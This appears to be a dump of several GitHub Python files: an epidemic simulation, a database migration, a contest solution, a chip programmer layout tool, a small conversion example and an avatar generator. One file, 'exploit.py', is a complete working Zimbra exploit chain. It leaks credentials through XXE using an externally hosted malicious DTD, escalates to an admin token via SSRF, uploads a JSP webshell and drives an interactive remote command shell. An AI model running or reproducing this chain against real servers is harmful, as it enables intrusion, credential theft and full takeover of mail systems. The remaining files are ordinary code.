np.random.poisson(lam=self.t_death, size=len(idx_dying))\n self.days_to_cure[idx_cure] = np.random.poisson(lam=self.t_cured, size=len(idx_cure))\n n_confirmed = np.random.binomial(len(idx_cure), self.detection_rate)\n idx_confirmed = np.append(idx_dying, np.random.choice(idx_cure, size=n_confirmed, replace=False))\n self.days_to_detect[idx_confirmed] = np.random.poisson(lam=self.t_confirmed, size=len(idx_confirmed))\n\n def _reset(self, mask):\n self.infected[mask] = False\n self.days[mask] = 0\n self.days_to_contagious[mask] = 0\n self.days_to_death[mask] = -1\n self.days_to_cure[mask] = -1\n self.days_to_detect[mask] = -1\n self.scale_each[mask] = self.scale\n\n def _scale(self):\n if (self.fraction_buffer > 0.001) or (np.sum(self.infected) / len(self.infected) > 0.5):\n self.scale += max(1, int(self.fraction_buffer * 100000))\n else:\n self.scale = max(1, self.scale-1)\n\n def is_contagious(self):\n return self.infected & (self.days == self.days_to_contagious)\n\n def is_dead(self):\n return self.infected & (self.days == self.days_to_death)\n\n def is_cured(self):\n return self.infected & (self.days == self.days_to_cure)\n\n def is_detected(self):\n return self.infected & (self.days == self.days_to_detect)\n\n def update(self):\n self.infect()\n self.detect()\n self.cure()\n self.die()\n # self._scale()\n # print('slots used: %s \\tscale=%s' % (np.sum(self.infected), self.scale))\n self.days[self.infected] += 1\n\n\nclass DayDrivenPandemie(object):\n\n def __init__(self, n_days=100, n_p=15, attack_rate=0.15, t_contagious=4, t_cured=14, t_death=20, t_confirmed=6,\n infected_start=10, lethality=0.01, detection_rate=0.8, total_population=83e6, confirmed_start=0,\n death_pdf='skewnorm'):\n\n assert infected_start >= confirmed_start, \"More confirmed than infected people!\"\n self.n_p = n_p\n self.attack_rate = attack_rate\n self.lethality = lethality\n self.detection_rate = detection_rate\n self.t_contagious = t_contagious\n self.t_cured = t_cured\n self.t_death = t_death\n self.death_pdf = death_pdf\n self.t_confirmed = t_confirmed\n self.total_population = total_population\n # print('lethality: %s \\tR0: %s \\tdetection_rate: %s' % (lethality, attack_rate*n_p, detection_rate))\n\n self.n_p_steps = {}\n\n self.day = 0\n self.n_days = n_days\n self.contagious_p_day = np.zeros(n_days)\n self.death_p_day = np.zeros(n_days)\n self.cured_p_day = np.zeros(n_days)\n self.detect_p_day = np.zeros(n_days)\n\n self.infected, self.contagious = infected_start, 0\n self.infected_total, self.confirmed_total = infected_start, confirmed_start\n self.infected_day = 0\n self.dead, self.dead_day, self.cured = 0, 0, 0\n self._assign_timing(infected_start)\n\n def _count_p_days(self, n, t, pdf='poisson'):\n if pdf == 'poisson':\n p_days = n * poisson.pmf(np.arange(self.n_days - self.day), mu=t)\n elif pdf == 'skewnorm':\n p_days = n * skewnorm.pdf(np.arange(self.n_days - self.day), a=5, loc=t, scale=15)\n elif pdf == 'lognorm':\n p_days = n * lognorm(np.arange(self.n_days - self.day))\n else:\n raise NotImplementedError(\"Density function pdf='%s' not implemented!\" % pdf)\n return np.pad(p_days, (self.day, 0), mode='constant')\n\n def _assign_timing(self, n):\n n_death = n * self.lethality\n n_detected = self.detection_rate * (n - n_death) + n_death\n self.contagious_p_day += self._count_p_days(n, self.t_contagious)\n self.cured_p_day += self._count_p_days(n - n_death, self.t_cured)\n self.death_p_day += self._count_p_days(n_death, self.t_death, pdf=self.death_pdf)\n self.detect_p_day += self._count_p_days(n_detected, self.t_confirmed)\n\n def infect(self):\n immune = self.infected_total\n n_eff = self.n_p * (self.total_population - immune) / self.total_population\n self.infected_day = self.contagious_p_day[self.day] * n_eff*self.attack_rate\n # self.infected_day = np.sum(np.random.poisson(n_eff*self.attack_rate, size=self.contagious_p_day[self.day]))\n self.infected += self.infected_day\n self.infected_total += self.infected_day\n self._assign_timing(self.infected_day)\n\n def update(self, n_sim=1):\n for i in range(n_sim):\n if str(self.day) in self.n_p_steps:\n self.n_p = self.n_p_steps[str(self.day)]\n self.infect()\n self.infected -= (self.cured_p_day[self.day] + self.death_p_day[self.day])\n self.contagious += self.contagious_p_day[self.day] - self.cured_p_day[self.day] - self.death_p_day[self.day]\n self.cured += self.cured_p_day[self.day]\n self.dead += self.death_p_day[self.day]\n self.confirmed_total += self.detect_p_day[self.day]\n self.day += 1\n\n def change_n_p(self, day, n_p):\n self.n_p_steps.update({str(day): n_p})\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n import matplotlib as mpl\n from plotting import with_latex\n mpl.rcParams.update(with_latex)\n\n days = np.arange(100)\n infected, confirmed_total = np.zeros(days.size), np.zeros(days.size)\n infected_day, infected_day_confirmed = np.zeros(days.size), np.zeros(days.size)\n cured, dead = np.zeros(days.size), np.zeros(days.size)\n world = DayDrivenPandemie(n_days=len(days), lethality=0.2, detection_rate=0.8)\n for i in days:\n world.update()\n infected[i], confirmed_total[i] = world.infected_total, world.confirmed_total\n infected_day[i] = world.infected_day\n cured[i], dead[i] = world.cured, world.dead\n infected_day_confirmed[1:] = np.diff(confirmed_total)\n\n plt.plot(days, infected, color='blue', label='infected (total)')\n plt.plot(days, confirmed_total, color='blue', ls='dashed', label='confirmed (total)')\n plt.plot(days, infected_day, color='k', label='new infections')\n plt.plot(days, infected_day_confirmed, color='k', ls='dashed', label='new confirmed')\n plt.plot(days, dead, color='red', label='dead')\n plt.plot(days, cured, color='green', label='cured')\n plt.legend(loc='upper left', fontsize=14)\n # plt.yscale('log')\n plt.xlabel(\"days\")\n plt.ylabel(\"counts\")\n plt.savefig('img/first_model_day.png', bbox_inches='tight')\n plt.close()\n","repo_name":"marcus-wirtz-snkeos/corona","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29936217741","text":"\"\"\"empty message\n\nRevision ID: 5eacd17e5903\nRevises: 5ecefe1f4e99\nCreate Date: 2022-04-10 20:41:20.521081\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '5eacd17e5903'\ndown_revision = '5ecefe1f4e99'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('setting',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=255), nullable=False),\n sa.Column('value_setting', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('setting')\n # ### end Alembic commands ###\n","repo_name":"Alessio-source/flask-blog","sub_path":"migrations/versions/5eacd17e5903_.py","file_name":"5eacd17e5903_.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71656301284","text":"from collections import defaultdict\ndef Miller_Rabin(N):\n if N <= 1:\n return False\n k = 0\n m = N - 1\n while m & 1 == 0:\n k += 1\n m >>= 1\n assert(2**k*m == N-1)\n task = [2,3,5,7,11,13,17,23,29,31,37,43,47]\n def test(N,t):\n b = pow(t,m,N)\n if b == 1:\n return True\n for i in range(0,k):\n if b == N - 1:\n return True\n b = pow(b,2,N)\n return False\n for t in task:\n if t >= N:\n break\n if not test(N,t):\n return False\n return True\ndef Legendre(A,p):\n row_p = p\n ans = 0\n while A//p != 0:\n ans += A//p\n p *= row_p\n return ans\nK = int(input())\nok = K\nprime = defaultdict(int)\nfor i in range(2,int(K**(0.5))+100):\n while K%i == 0:\n K //= i\n prime[i] += 1\nng = 1\nwhile abs(ok-ng) > 1:\n mid = (ok+ng)//2\n flag = True\n for p in prime.keys():\n if prime[p] > Legendre(mid,p):\n flag = False\n if flag:\n ok = mid\n else:\n ng = mid\nprint(max(ok,ng))","repo_name":"mitu24472/Atcoder","sub_path":"ABC/Atcoder Beginner Contest 280/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1679349370","text":"#!/usr/bin/env python3\nimport re\nimport time\nimport requests\nimport html\n\nrequests.packages.urllib3.disable_warnings()\n\n# Target configuration\nTARGET_HOST = 'mail.test.com'\nTARGET_URL = f'https://{TARGET_HOST}'\n\n# URL to the malicious_dtd file\nMALICIOUS_DTD_URL = 'https://YOUR-DOMAIN/malicious_dtd'\n\n\nTIME_DELAY = 2\n\n\ndef get_credentials_via_xxe() -> tuple:\n print('[i] Getting Zimbra credentials')\n time.sleep(TIME_DELAY)\n xxe_xml = f'''\n %dtd;\n %all;\n ]\n >\n \n \n aaaaa\n &fileContents;\n \n '''\n time.sleep(TIME_DELAY)\n headers = {\n 'Content-Type': 'application/xml'\n }\n resp = requests.post(TARGET_URL + '/Autodiscover/Autodiscover.xml', headers=headers, data=xxe_xml, verify=False)\n try:\n if resp.status_code == 503:\n resp_body = html.unescape(resp.text)\n zimbra_user = re.search(\n r'''\\n (.*)\\n \\n ''',\n resp_body).group(1)\n zimbra_password = re.search(\n r'''\\n (.*)\\n \\n ''',\n resp_body).group(1)\n print('[+] Got credentials: ' + zimbra_user + ':' + zimbra_password + '\\n')\n return zimbra_user, zimbra_password\n else:\n print(f'[-] HTTP code = {resp.status_code} != 503. Terminating program...')\n exit()\n except RuntimeError:\n print('[-] Unknown error. Terminating program...')\n exit()\n\n\ndef get_low_privilege_token(credentials: tuple) -> str:\n print('[i] Getting low-privilege token')\n time.sleep(TIME_DELAY)\n zm_auth_token_xml = f'''\n \n \n \n \n \n \n \n {credentials[0]}\n {credentials[1]}\n \n \n '''\n headers = {\n 'Content-Type': 'application/xml'\n }\n resp = requests.post(TARGET_URL + '/service/soap', headers=headers, data=zm_auth_token_xml, verify=False)\n try:\n if resp.status_code == 200:\n zm_auth_token = re.search('''(.*)''', resp.text).group(1)\n print('[+] Got low-privilege token: ' + zm_auth_token + '\\n')\n return zm_auth_token\n else:\n print(f'[-] HTTP code = {resp.status_code} != 200. Terminating program...')\n exit()\n except RuntimeError:\n print('[-] Unknown error. Terminating program...')\n exit()\n\n\ndef get_high_privilege_token_via_ssrf(zm_auth_token: str) -> str:\n print('[i] Getting high-privilege token')\n time.sleep(TIME_DELAY)\n zm_admin_auth_token_xml = f'''\n \n \n \n \n \n \n \n {credentials[0]}\n {credentials[1]}\n \n \n '''\n headers = {\n 'Content-Type': 'application/xml',\n 'Host': f'{TARGET_HOST}:7071'\n }\n cookies = {\n 'ZM_ADMIN_AUTH_TOKEN': f'{zm_auth_token}'\n }\n resp = requests.post(TARGET_URL + f'/service/proxy?target=https://127.0.0.1:7071/service/admin/soap',\n headers=headers, cookies=cookies, data=zm_admin_auth_token_xml, verify=False)\n try:\n if resp.status_code == 200:\n zm_admin_auth_token = re.search('''(.*)''', resp.text).group(1)\n print('[+] Got high-privilege token: ' + zm_admin_auth_token + '\\n')\n return zm_admin_auth_token\n else:\n print(f'[-] HTTP code = {resp.status_code} != 200. Terminating program...')\n exit()\n except RuntimeError:\n print('[-] Unknown error. Terminating program...')\n exit()\n\n\ndef upload_webshell(zm_admin_auth_token: str):\n print('[i] Uploading webshell')\n time.sleep(TIME_DELAY)\n files = {\n 'file1': ('shell.jsp', open('shell.jsp', 'rb'), 'application/octet-stream')\n }\n cookies = {\n 'ZM_ADMIN_AUTH_TOKEN': f'{zm_admin_auth_token}'\n }\n resp = requests.post(TARGET_URL + '/service/extension/clientUploader/upload/', cookies=cookies, files=files,\n verify=False)\n try:\n if resp.status_code == 200:\n print(f'[+] Uploaded webshell. Location {TARGET_URL}/downloads/shell.jsp\\n')\n else:\n print(f'[-] HTTP code = {resp.status_code} != 200. Terminating program...')\n exit()\n except RuntimeError:\n print('[-] Unknown error. Terminating program...')\n exit()\n\n\ndef rce_via_webshell(zm_admin_auth_token: str):\n try:\n while True:\n cmd = input('\\u001b[32mwebshell@target$ \\u001b[0m')\n data = {\n 'cmd': cmd\n }\n cookies = {\n 'ZM_ADMIN_AUTH_TOKEN': f'{zm_admin_auth_token}'\n }\n resp = requests.post(TARGET_URL + '/downloads/shell.jsp', cookies=cookies, data=data, verify=False)\n try:\n if resp.status_code == 200:\n result = re.search(r'''\\n([\\w\\W]*)\\n''', resp.text)\n if isinstance(result, re.Match):\n print(result.group(1))\n else:\n print('[i] There is no command\\'s output')\n else:\n print(f'[-] HTTP code = {resp.status_code} != 200. Terminating program...')\n exit()\n except RuntimeError:\n print('[-] Unknown error. Terminating program...')\n exit()\n except KeyboardInterrupt:\n print('\\n[i] Exited by user')\n exit()\n\n\nif __name__ == '__main__':\n credentials = get_credentials_via_xxe()\n\n zm_auth_token = get_low_privilege_token(credentials)\n\n zm_admin_auth_token = get_high_privilege_token_via_ssrf(zm_auth_token)\n\n upload_webshell(zm_admin_auth_token)\n\n rce_via_webshell(zm_admin_auth_token)\n","repo_name":"nth347/Zimbra-RCE-exploit","sub_path":"exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"52"} +{"seq_id":"15542121798","text":"from .util import *\nfrom .top_devices import *\n\n\nclass LayoutGenerator:\n\t\"Layout generator baseclass.\"\n\n\tclass MapError(Exception): pass\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef setProgrammerType(self, programmer=\"TOP2049\"):\n\t\tsupportedDevices = {\n\t\t\t# Map deviceName : layoutModules, ZIF-pin-count\n\t\t\t\"TOP2049\"\t: (top2049_vcc_layouts, top2049_vpp_layouts,\n\t\t\t\t\t top2049_gnd_layouts, 48)\n\t\t}\n\t\ttry:\n\t\t\t(vcc_layouts, vpp_layouts, gnd_layouts, zifPins) = \\\n\t\t\t\tsupportedDevices[programmer.upper()]\n\t\texcept (KeyError) as e:\n\t\t\traise TOPException(\"Programmer \" + programmer + \" not supported\")\n\t\tself.vccLayout = vcc_layouts.VCCLayout()\n\t\tself.vppLayout = vpp_layouts.VPPLayout()\n\t\tself.gndLayout = gnd_layouts.GNDLayout()\n\t\tself.zifPins = zifPins\n\n\tdef setPins(self, vccPin, vppPins, gndPin):\n\t\t\"\"\"Load the supply pin locations.\n\t\tvppPins may either be one pin number or a list of pin numbers or None.\"\"\"\n\t\tself.vccPin = vccPin\n\t\tif vppPins is None:\n\t\t\tself.vppPins = [ ]\n\t\telse:\n\t\t\ttry:\n\t\t\t\tself.vppPins = list(vppPins)\n\t\t\texcept TypeError:\n\t\t\t\tself.vppPins = [ vppPins, ]\n\t\tself.gndPin = gndPin\n\t\tself.verifyPins()\n\n\tdef getZifPinForPackagePin(self, packagePin):\n\t\t\"Get the ZIF pin number corresponding to the package pin number\"\n\t\treturn self.mapPin2zif(packagePin, self.result_offset,\n\t\t\t\t self.result_upsideDown)\n\n\tdef verifyPins(self):\n\t\tpass\n\n\tdef maxOffset(self, upsideDown):\n\t\t\"Returns the max possible chip offset (in the ZIF socket)\"\n\t\traise TOPException(\"Reimplement me\")\n\n\tdef mapToZIF(self, offset, upsideDown):\n\t\t\"Tries to map the chip into the ZIF socket\"\n\t\tif offset < 0 or offset > self.maxOffset(upsideDown):\n\t\t\traise self.MapError()\n\n\t\t# Find a GND layout\n\t\tzifGndPin = self.mapPin2zif(self.gndPin, offset, upsideDown)\n\t\tself.result_GND = self.__findSingleLayout(\n\t\t\t\t\tself.gndLayout,\n\t\t\t\t\t(1 << (zifGndPin - 1)))\n\n\t\t# Find a VCC layout\n\t\tzifVccPin = self.mapPin2zif(self.vccPin, offset, upsideDown)\n\t\tself.result_VCC = self.__findSingleLayout(\n\t\t\t\t\tself.vccLayout,\n\t\t\t\t\t(1 << (zifVccPin - 1)))\n\n\t\t# Find a (possibly cumulative) VPP layout\n\t\tif not self.vppPins:\n\t\t\tself.result_VPP = None\n\t\telse:\n\t\t\tzifVppMask = 0\n\t\t\tfor vppPin in self.vppPins:\n\t\t\t\tpin = self.mapPin2zif(vppPin, offset, upsideDown)\n\t\t\t\tzifVppMask |= (1 << (pin - 1))\n\t\t\tself.result_VPP = self.__findCumulativeLayout(\n\t\t\t\t\t\tself.vppLayout,\n\t\t\t\t\t\tzifVppMask)\n\n\t\t# Also store the chip orientation for later use.\n\t\tself.result_upsideDown = upsideDown\n\t\tself.result_offset = offset\n\n\tdef mapPin2zif(self, packagePin, offset, upsideDown):\n\t\t\"Map a package pin to a ZIF pin. Returns the ZIF pin number.\"\n\t\traise TOPException(\"Reimplement me\")\n\n\tdef zifLayoutAsciiArt(self):\n\t\t\"Returns nice ascii ART of the mapped ZIF socket\"\n\t\traise TOPException(\"Reimplement me\")\n\n\tdef zifPinAssignments(self):\n\t\t\"Returns a string describing the pin assignments\"\n\t\tvcc = str(self.__bitmask2pinList(self.result_VCC[1])).strip(\"[]\")\n\t\tret = \"VCC ZIF pins: \" + vcc + \"\\n\"\n\t\tif self.result_VPP:\n\t\t\tvppBitmask = 0\n\t\t\tfor (id, mask) in self.result_VPP:\n\t\t\t\tvppBitmask |= mask\n\t\t\tvpp = str(self.__bitmask2pinList(vppBitmask)).strip(\"[]\")\n\t\t\tret += \"VPP ZIF pins: \" + vpp + \"\\n\"\n\t\tgnd = str(self.__bitmask2pinList(self.result_GND[1])).strip(\"[]\")\n\t\tret += \"GND ZIF pins: \" + gnd + \"\\n\"\n\t\treturn ret\n\n\tdef __bitmask2pinList(self, bitmask):\n\t\tret = []\n\t\tbit = 0\n\t\twhile bitmask:\n\t\t\tif bitmask & (1 << bit):\n\t\t\t\tret.append(bit + 1)\n\t\t\tbitmask &= ~(1 << bit)\n\t\t\tbit += 1\n\t\treturn ret\n\n\tdef __pinList2Bitmask(self, pinList):\n\t\tbitmask = 0\n\t\tfor pin in pinList:\n\t\t\tassert(pin >= 1)\n\t\t\tbitmask |= (1 << (pin - 1))\n\t\treturn bitmask\n\n\tdef recalculate(self):\n\t\t\"Redo the mapping calculation\"\n\t\tfor upsideDown in (False, True):\n\t\t\toffset = self.maxOffset(upsideDown)\n\t\t\twhile offset >= 0:\n\t\t\t\ttry:\n\t\t\t\t\tself.mapToZIF(offset, upsideDown)\n\t\t\t\texcept (LayoutGenerator.MapError) as e:\n\t\t\t\t\toffset -= 1\n\t\t\t\t\tcontinue\n\t\t\t\treturn\n\t\traise TOPException(\"Did not find a possible valid layout for the setup\")\n\n\tdef getGNDLayout(self):\n\t\t\"Get the calculated GND layout ID and mask. Returns a tuple (ID, mask).\"\n\t\treturn self.result_GND\n\n\tdef applyGNDLayout(self, top):\n\t\t\"Send the GND layout to hardware\"\n\t\t(layoutID, layoutMask) = self.getGNDLayout()\n\t\ttop.gnd.setLayoutID(layoutID)\n\n\tdef getVCCLayout(self):\n\t\t\"Get the calculated VCC layout ID and mask. Returns a tuple (ID, mask).\"\n\t\treturn self.result_VCC\n\n\tdef applyVCCLayout(self, top):\n\t\t\"Send the VCC layout to hardware\"\n\t\t(layoutID, layoutMask) = self.getVCCLayout()\n\t\ttop.vcc.setLayoutID(layoutID)\n\n\tdef getVPPLayouts(self):\n\t\t\"\"\"Get the calculated VPP layout IDs and masks.\n\t\tReturns a list of tuples ((ID, mask), (ID, mask), ...)\"\"\"\n\t\treturn self.result_VPP\n\n\tdef applyVPPLayout(self, top, packagePins=[]):\n\t\t\"\"\"Send the VPP layout to hardware.\n\t\tpackagePins is a list of pins (on the chip package) to activate.\n\t\tIf packagePins is not passed, all VPP pins are driven to VPP.\"\"\"\n\t\tif packagePins:\n\t\t\tpins = []\n\t\t\tfor pin in packagePins:\n\t\t\t\tpins.append(self.mapPin2zif(pin, self.result_offset,\n\t\t\t\t\t\t\t self.result_upsideDown))\n\t\t\tpackagePinsMask = self.__pinList2Bitmask(pins)\n\t\ttop.vpp.setLayoutMask(0) # Reset\n\t\tlayouts = self.getVPPLayouts()\n\t\tif layouts:\n\t\t\tfor (layoutID, mask) in layouts:\n\t\t\t\tif packagePins:\n\t\t\t\t\tif mask & packagePinsMask == 0:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif mask & packagePinsMask != mask:\n\t\t\t\t\t\traise TOPException(\n\t\t\t\t\t\t\t\"Unable to apply partial VPP layout\")\n\t\t\t\ttop.vpp.setLayoutID(layoutID)\n\n\tdef __findSingleLayout(self, layoutDefs, zifBitmask):\n\t\t# Returns an (id, mask) tuple\n\t\tfor (id, mask) in layoutDefs.supportedLayouts():\n\t\t\tif zifBitmask == mask:\n\t\t\t\tbreak\n\t\telse:\n\t\t\traise self.MapError()\n\t\treturn (id, mask)\n\n\tdef __findCumulativeLayout(self, layoutDefs, zifBitmask):\n\t\t# Returns a list of (id, mask) tuples\n\t\tresult = []\n\t\tfor (id, mask) in layoutDefs.supportedLayouts():\n\t\t\tif zifBitmask == 0:\n\t\t\t\tbreak\n\t\t\tif mask == 0:\n\t\t\t\tcontinue\n\t\t\tif mask & zifBitmask == mask:\n\t\t\t\tresult.append( (id, mask) )\n\t\t\t\tzifBitmask &= ~mask\n\t\tif zifBitmask:\n\t\t\traise self.MapError()\n\t\treturn result\n\nclass LayoutGeneratorDIP(LayoutGenerator):\n\t\"Layout generator for DIP packages.\"\n\n\tdef __init__(self, nrPins):\n\t\tLayoutGenerator.__init__(self)\n\t\tself.nrPins = nrPins\n\n\tdef verifyPins(self):\n\t\tLayoutGenerator.verifyPins(self)\n\t\tif self.nrPins < 2 or self.nrPins > self.zifPins or self.nrPins % 2 != 0:\n\t\t\traise TOPException(\"Invalid DIP package\")\n\t\tif self.vccPin < 1 or self.vccPin > self.nrPins:\n\t\t\traise TOPException(\"Invalid VCC pin number for the selected package\")\n\t\tfor vppPin in self.vppPins:\n\t\t\tif vppPin < 1 or vppPin > self.nrPins:\n\t\t\t\traise TOPException(\"Invalid VPP pin number for the selected package\")\n\t\tif self.gndPin < 1 or self.gndPin > self.nrPins:\n\t\t\traise TOPException(\"Invalid GND pin number for the selected package\")\n\n\tdef maxOffset(self, upsideDown):\n\t\treturn self.zifPins // 2 - self.nrPins // 2\n\n\tdef mapPin2zif(self, dipPin, offset, upsideDown):\n\t\tassert(dipPin >= 1 and dipPin <= self.nrPins)\n\t\tif upsideDown:\n\t\t\tif dipPin > self.nrPins // 2:\n\t\t\t\t# Right side of DIP\n\t\t\t\tdipPin -= self.nrPins // 2\n\t\t\t\treturn dipPin + offset\n\t\t\telse:\n\t\t\t\t# Left side of DIP\n\t\t\t\treturn self.zifPins - self.nrPins // 2 + dipPin - offset\n\t\telse:\n\t\t\tif dipPin > self.nrPins // 2:\n\t\t\t\t# Right side of DIP\n\t\t\t\tdipPin -= self.nrPins // 2\n\t\t\t\treturn self.zifPins - self.nrPins // 2 + dipPin - offset\n\t\t\telse:\n\t\t\t\t# Left side of DIP\n\t\t\t\treturn dipPin + offset\n\n\tdef zifLayoutAsciiArt(self):\n\t\tdef line(prefix, content, postfix):\n\t\t\treturn \"%3s %s %3s\\n\" % (prefix, content, postfix)\n\n\t\tzifGnd = self.getZifPinForPackagePin(self.gndPin)\n\t\tzifVcc = self.getZifPinForPackagePin(self.vccPin)\n\t\tzifVpp = [ self.getZifPinForPackagePin(p) \\\n\t\t\t for p in self.vppPins ]\n\n\t\tret = line(\"\", \"T ZIF socket\", \"\")\n\t\tret += line(\"\", \"^--o==============o\", \"\")\n\t\tfor zp in range(1, self.zifPins // 2 + 1):\n\t\t\tprefix, postfix = \"\", \"\"\n\t\t\tif zp == zifGnd:\n\t\t\t\tprefix = \"GND\"\n\t\t\tif self.zifPins - zp + 1 == zifGnd:\n\t\t\t\tpostfix = \"GND\"\n\t\t\tif zp == zifVcc:\n\t\t\t\tprefix = \"VCC\"\n\t\t\tif self.zifPins - zp + 1 == zifVcc:\n\t\t\t\tpostfix = \"VCC\"\n\t\t\tif zp in zifVpp:\n\t\t\t\tprefix = \"VPP\"\n\t\t\tif self.zifPins - zp + 1 in zifVpp:\n\t\t\t\tpostfix = \"VPP\"\n\n\t\t\tif zp < self.result_offset + 1 or \\\n\t\t\t zp > self.result_offset + self.nrPins // 2:\n\t\t\t\tret += line(prefix,\n\t\t\t\t\t\"%2d |----- || -----| %2d\" %\\\n\t\t\t\t\t(zp, self.zifPins + 1 - zp),\n\t\t\t\t\tpostfix)\n\t\t\telse:\n\t\t\t\tif zp == self.result_offset + 1 and \\\n\t\t\t\t not self.result_upsideDown:\n\t\t\t\t\tret += line(prefix,\n\t\t\t\t\t\t\"%2d |-- 1##..##o --| %2d\" %\\\n\t\t\t\t\t\t(zp, self.zifPins + 1 - zp),\n\t\t\t\t\t\tpostfix)\n\t\t\t\telif zp == self.result_offset + self.nrPins // 2 and \\\n\t\t\t\t self.result_upsideDown:\n\t\t\t\t\tret += line(prefix,\n\t\t\t\t\t\t\"%2d |-- o##''##1 --| %2d\" %\\\n\t\t\t\t\t\t(zp, self.zifPins + 1 - zp),\n\t\t\t\t\t\tpostfix)\n\t\t\t\telse:\n\t\t\t\t\tret += line(prefix,\n\t\t\t\t\t\t\"%2d |-- o######o --| %2d\" %\\\n\t\t\t\t\t\t(zp, self.zifPins + 1 - zp),\n\t\t\t\t\t\tpostfix)\n\t\tret += line(\"\", \" o==============o\", \"\")\n\t\treturn ret\n\ndef createLayoutGenerator(package):\n\ttry:\n\t\tfor regex in (\"DIP(\\d+)\", \"PDIP(\\d+)\", \"SO(\\d+)\", \"TSSOP(\\d+)\", ):\n\t\t\tm = re.match(regex, package, re.IGNORECASE)\n\t\t\tif m:\n\t\t\t\tnrPins = int(m.group(1))\n\t\t\t\treturn LayoutGeneratorDIP(nrPins)\n\t\tif package.upper() == \"PLCC32\": # 1:1 adapter\n\t\t\treturn LayoutGeneratorDIP(32)\n\t\tif package.upper() == \"PLCC44\": # 1:1 adapter\n\t\t\treturn LayoutGeneratorDIP(44)\n\t\traise ValueError()\n\texcept (ValueError) as e:\n\t\traise TOPException(\"Unknown package type \" + package)\n","repo_name":"mbuesch/toprammer","sub_path":"libtoprammer/layout_generator.py","file_name":"layout_generator.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"5212707496","text":"#!/usr/bin/env python3\n\n'''\n一个将函数作为参数传递,并在函数体内调用这些函数,更加实际的例子。这个脚本用传入的\n转换函数简单将一个序列的数转化为相同的类型。特别地,test()函数传入一个内建函数int(),\n或者float()来执行转换。\n'''\n\ndef convert(func, seq):\n 'conv. sequence of numbers to same type'\n return [func(eachNum) for eachNum in seq]\n\nmyseq = (123, 45.67, -6.2e8, 9999999999999999)\n\nprint(convert(int, myseq))\nprint(convert(float, myseq))\n\n","repo_name":"ulric-li/codebase","sub_path":"python/numConv.py","file_name":"numConv.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2334445155","text":"import requests\nimport json\nfrom PIL import Image\nfrom io import BytesIO\nfrom config import OPENAI_API_KEY # Assuming OPENAI_API_KEY is defined in config.py\n\ndef fetch_character_details(global_cache):\n \"\"\"\n Fetch character details from the global cache.\n \"\"\"\n character_details = global_cache.get('character_details', {})\n return character_details\n\ndef generate_avatar_image(character_details):\n \"\"\"\n Generate an avatar image based on the character details using the OpenAI API.\n \"\"\"\n prompt = f\"A {character_details.get('gender', 'unspecified')} character with {character_details.get('eye_color', 'unspecified')} eyes and {character_details.get('hair_color', 'unspecified')} hair, having a {character_details.get('body_type', 'unspecified')} body type.\"\n \n url = \"https://api.openai.com/v1/images/generations\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {OPENAI_API_KEY}\"\n }\n data = {\n \"prompt\": prompt,\n \"n\": 1,\n \"size\": \"512x512\",\n \"response_format\": \"url\"\n }\n response = requests.post(url, headers=headers, json=data)\n \n if response.status_code == 200:\n image_url = response.json()[\"data\"][0][\"url\"]\n image_response = requests.get(image_url)\n image = Image.open(BytesIO(image_response.content))\n avatar_path = f\"C:\\\\Users\\\\Luca\\\\Documents\\\\GITHUB\\\\AgarthaRPG\\\\dev_app\\\\game\\\\avatar\\\\{character_details['username']}_{character_details['character_name']}.png\"\n image.save(avatar_path)\n return avatar_path\n else:\n return None\n\ndef generate_character_description(character_details):\n \"\"\"\n Generate a textual description of the character using the OpenAI API.\n \"\"\"\n prompt = f\"Tell me more about a {character_details.get('gender', 'unspecified')} character with {character_details.get('eye_color', 'unspecified')} eyes and {character_details.get('hair_color', 'unspecified')} hair, having a {character_details.get('body_type', 'unspecified')} body type.\"\n \n url = \"https://api.openai.com/v1/chat/completions\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {OPENAI_API_KEY}\"\n }\n data = {\n \"model\": \"gpt-3.5-turbo\",\n \"messages\": [\n {\n \"role\": \"system\",\n \"content\": \"You are a helpful assistant.\"\n },\n {\n \"role\": \"user\",\n \"content\": prompt\n }\n ]\n }\n response = requests.post(url, headers=headers, json=data)\n \n if response.status_code == 200:\n return response.json()[\"choices\"][0][\"message\"][\"content\"]\n else:\n return None\n\nif __name__ == \"__main__\":\n global_cache = {\n 'character_details': {\n 'username': 'luca',\n 'character_name': 'john_doe',\n 'eye_color': 'blue',\n 'hair_color': 'blonde',\n 'gender': 'Male',\n 'body_type': 'Normal'\n }\n }\n \n character_details = fetch_character_details(global_cache)\n \n avatar_path = generate_avatar_image(character_details)\n print(f\"Avatar saved at: {avatar_path}\")\n \n character_description = generate_character_description(character_details)\n print(f\"Generated Character Description: {character_description}\")\n","repo_name":"LucaCGN/AgarthaRPG","sub_path":"dev_app/modules/general/avatar_generation.py","file_name":"avatar_generation.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} 